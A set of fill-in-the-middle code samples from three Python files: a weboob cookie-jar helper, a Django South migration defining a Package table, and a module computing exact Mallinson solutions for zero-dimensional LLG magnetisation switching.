new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | from_cookiejar |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def <|fim_middle|>(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | export |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def <|fim_middle|>(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | _cookies_from_attrs_set |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def <|fim_middle|>(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | make_cookies |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def <|fim_middle|>(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | copy |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),<|fim▁hole|>
complete_apps = ['api']<|fim▁end|> | 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
} |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
<|fim_middle|>
<|fim▁end|> | def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api'] |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
<|fim_middle|>
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url']) |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
<|fim_middle|>
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package') |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def <|fim_middle|>(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | forwards |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def <|fim_middle|>(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | backwards |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \<|fim▁hole|> # Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()<|fim▁end|> | calculate_equivalent_dynamics(magnetic_parameters, pols)
|
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
<|fim_middle|>
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c) |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
<|fim_middle|>
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi) |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
<|fim_middle|>
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
